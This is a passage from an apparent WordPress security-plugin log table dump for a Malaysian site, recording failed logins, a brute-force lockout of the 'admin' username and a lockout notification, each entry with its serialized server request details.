ENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/v2/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/v2/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRKDxTEVi0fEJEHuDZclwAAAAw\";s:12:\"REDIRECT_URL\";s:14:\"/v2/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"50.62.208.62\";s:11:\"REMOTE_PORT\";s:5:\"58146\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/v2/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/v2/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRKDxTEVi0fEJEHuDZclwAAAAw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853647.3414\";s:12:\"REQUEST_TIME\";s:10:\"1566853647\";}}','notice','2019-08-26 21:07:29','2019-08-26 21:07:27',18307936,19508648,'http://bintara.com.my/v2/xmlrpc.php',1,0,'50.62.208.62'),(23313,0,'lockout','username-lockout::admin','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:5:\"admin\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-08-27 05:07:27\";s:17:\"lockout_start_gmt\";s:19:\"2019-08-26 21:07:27\";s:14:\"lockout_expire\";s:19:\"2019-08-27 05:22:27\";s:18:\"lockout_expire_gmt\";s:19:\"2019-08-26 21:22:27\";s:16:\"lockout_username\";s:5:\"admin\";}','action','2019-08-26 21:07:29','2019-08-26 21:07:27',18388568,19508648,'http://bintara.com.my/v2/xmlrpc.php',1,0,'50.62.208.62'),(23314,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-08-26 21:07:29','2019-08-26 21:07:27',18595728,19508648,'http://bintara.com.my/v2/xmlrpc.php',1,0,'50.62.208.62'),(23315,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"59.102.73.194\";s:11:\"REMOTE_PORT\";s:5:\"53013\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRKSx90bn5mtr-PXqq5gQAAAFU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853708.0592\";s:12:\"REQUEST_TIME\";s:10:\"1566853708\";}}','notice','2019-08-26 21:08:29','2019-08-26 21:08:28',17687992,19180152,'https://bintara.com.my/wp-login.php',1,0,'59.102.73.194'),(23316,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.101.102\";s:11:\"REMOTE_PORT\";s:5:\"36762\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWROrhTEVi0fEJEHuDZengAAABA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566854830.2815\";s:12:\"REQUEST_TIME\";s:10:\"1566854830\";}}','notice','2019-08-26 21:27:11','2019-08-26 21:27:10',17686248,19176376,'https://bintara.com.my/wp-login.php',1,0,'151.80.101.102'),(23317,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.232.123.80\";s:11:\"REMOTE_PORT\";s:5:\"54066\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRQvxTEVi0fEJEHuDZfqAAAABQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566855360.0587\";s:12:\"REQUEST_TIME\";s:10:\"1566855360\";}}','notice','2019-08-26 21:36:01','2019-08-26 21:36:00',17682864,19173584,'https://bintara.com.my/wp-login.php',1,0,'103.232.123.80'),(23318,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"69.163.225.124\";s:11:\"REMOTE_PORT\";s:5:\"54284\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRSmRTEVi0fEJEHuDZgUgAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566855833.3307\";s:12:\"REQUEST_TIME\";s:10:\"1566855833\";}}','notice','2019-08-26 21:43:54','2019-08-26 21:43:53',17682864,19173584,'https://bintara.com.my/wp-login.php',1,0,'69.163.225.124'),(23319,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"207.180.240.84\";s:11:\"REMOTE_PORT\";s:5:\"46416\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRUoWXkG1atThADMYGQlgAAANA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566856353.3757\";s:12:\"REQUEST_TIME\";s:10:\"1566856353\";}}','notice','2019-08-26 21:52:34','2019-08-26 21:52:33',17684696,19175472,'https://bintara.com.my/wp-login.php',1,0,'207.180.240.84'),(23320,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"207.180.240.84\";s:11:\"REMOTE_PORT\";s:5:\"46928\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRUpBTEVi0fEJEHuDZg@wAAABY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566856356.4464\";s:12:\"REQUEST_TIME\";s:10:\"1566856356\";}}','notice','2019-08-26 21:52:37','2019-08-26 21:52:36',18200064,19498296,'https://bintara.com.my/xmlrpc.php',1,0,'207.180.240.84'),(23321,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"5.196.23.137\";s:11:\"REMOTE_PORT\";s:5:\"36758\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRWmxTEVi0fEJEHuDZhrQAAABM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566856859.9974\";s:12:\"REQUEST_TIME\";s:10:\"1566856859\";}}','notice','2019-08-26 22:01:01','2019-08-26 22:01:00',17685456,19176872,'https://bintara.com.my/wp-login.php',1,0,'5.196.23.137'),(23322,0,'brute_force','invalid-login::username-test1234','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:8:\"test1234\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"476\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"5.196.23.137\";s:11:\"REMOTE_PORT\";s:5:\"37338\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRWnh90bn5mtr-PXqq68AAAAEQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566856862.914\";s:12:\"REQUEST_TIME\";s:10:\"1566856862\";}}','notice','2019-08-26 22:01:04','2019-08-26 